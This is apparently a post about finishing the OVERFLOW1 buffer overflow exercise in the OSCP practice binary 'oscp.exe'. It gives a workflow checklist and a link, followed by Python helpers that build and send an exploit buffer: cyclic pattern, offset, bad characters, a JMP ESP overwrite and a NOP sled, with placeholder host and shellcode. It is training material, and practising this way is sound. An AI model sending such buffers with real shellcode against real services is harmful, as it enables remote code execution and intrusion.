First buffer overflow exploit done. “oscp.exe” has 10 overflows you can practice on; this one is for “OVERFLOW1”. Using tools like Immunity Debugger and Mona, we followed a proven set of steps to create an exploit in Python 3:
✔️ Fuzzed the app to determine roughly when it would crash by flooding the buffer
✔️ Used pattern matching to determine the exact offset
✔️ Verified we controlled EIP by using a specific string of characters
✔️ Figured out what the bad characters were and passed them to msfvenom when generating the shellcode
✔️ Found the JMP ESP address
✔️ Finished up the exploit and, for bonus points, coded it to pop a shell in the same window using subprocess and Popen.
https://github.com/rflemen/python_code/blob/main/buffer_overflows/oscp.exe/OVERFLOW1/exploit.py
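As an added illustration of the checklist above (this is not the linked exploit.py and not the author's code), the Python 3 helpers below cover each step offline: generating a unique pattern, turning the EIP value seen in the debugger into an offset, spotting the first bad character by comparing the sent bytes with a memory dump, formatting the msfvenom `-b` list, and assembling the final buffer with a little-endian JMP ESP address. The target IP and port, the `OVERFLOW1 ` prefix format, the EIP value, the bad characters and the JMP ESP address are placeholders, not values taken from oscp.exe.

```python
"""Helpers for the OVERFLOW1-style stack overflow workflow.
Added example, not the linked exploit.py; all target values are placeholders."""
import socket
import string
import struct
from typing import Optional

TARGET_IP = "10.10.10.10"      # assumption: placeholder, not a real host
TARGET_PORT = 1337             # assumption: placeholder port
PREFIX = b"OVERFLOW1 "         # assumption: command prefix the service expects


def cyclic_pattern(length: int) -> bytes:
    """Unique 'Aa0Aa1Aa2...' pattern in the style of msf-pattern_create, so any
    4-byte window identifies its own position in the buffer."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """Offset of the value the debugger shows in EIP after the pattern was sent.
    The register is displayed as an integer but the bytes sit little-endian in
    memory, so pack it that way before searching (what msf-pattern_offset does)."""
    needle = struct.pack("<I", eip_value)
    idx = cyclic_pattern(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value %#x not found in pattern" % eip_value)
    return idx


def badchar_test_bytes(exclude: bytes = b"\x00") -> bytes:
    """Every byte 0x01-0xff except already-known bad ones: placed right after the
    EIP overwrite, then dumped from ESP in the debugger and compared to what was sent."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent: bytes, dumped: bytes) -> Optional[int]:
    """First byte the service mangled or truncated (same idea as !mona compare).
    Only the first mismatch is trustworthy: bytes after a bad one may be shifted,
    so add it to the exclude list and send the test bytes again."""
    for i, s in enumerate(sent):
        if i >= len(dumped) or dumped[i] != s:
            return s
    return None


def msfvenom_badchars(bad: bytes) -> str:
    """Format the exclude list for msfvenom's -b option, e.g. '\\x00\\x0a'."""
    return "".join("\\x%02x" % b for b in bad)


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nops: int = 16) -> bytes:
    """prefix | padding up to saved EIP | JMP ESP address (little-endian) | NOP sled | shellcode."""
    return (PREFIX
            + b"A" * offset
            + struct.pack("<I", jmp_esp)   # overwrite saved EIP with the JMP ESP gadget
            + b"\x90" * nops               # sled in case ESP lands slightly off
            + shellcode)


def send_payload(payload: bytes, ip: str = TARGET_IP, port: int = TARGET_PORT) -> None:
    """Deliver one buffer to the service (not exercised offline)."""
    with socket.create_connection((ip, port), timeout=5) as s:
        s.recv(1024)                       # banner
        s.sendall(payload + b"\r\n")


if __name__ == "__main__":
    # Placeholder values; real ones come from the debugger, mona and msfvenom.
    offset = pattern_offset(0x6F43396E)            # assumption: EIP seen after the pattern crash
    print("offset:", offset)
    print("msfvenom -b", msfvenom_badchars(b"\x00\x0a"))  # assumption: bad chars found
    shellcode = b"\xcc" * 4                        # stand-in for msfvenom output
    send_payload(build_payload(offset, 0x625011AF, shellcode))  # assumption: JMP ESP address
```

The search in `pattern_offset` is the step people most often get backwards: Immunity shows EIP as `6F43396E`, but the bytes in the buffer are `6E 39 43 6F`, so the value has to be packed little-endian before looking it up, and the JMP ESP address is packed the same way in `build_payload`.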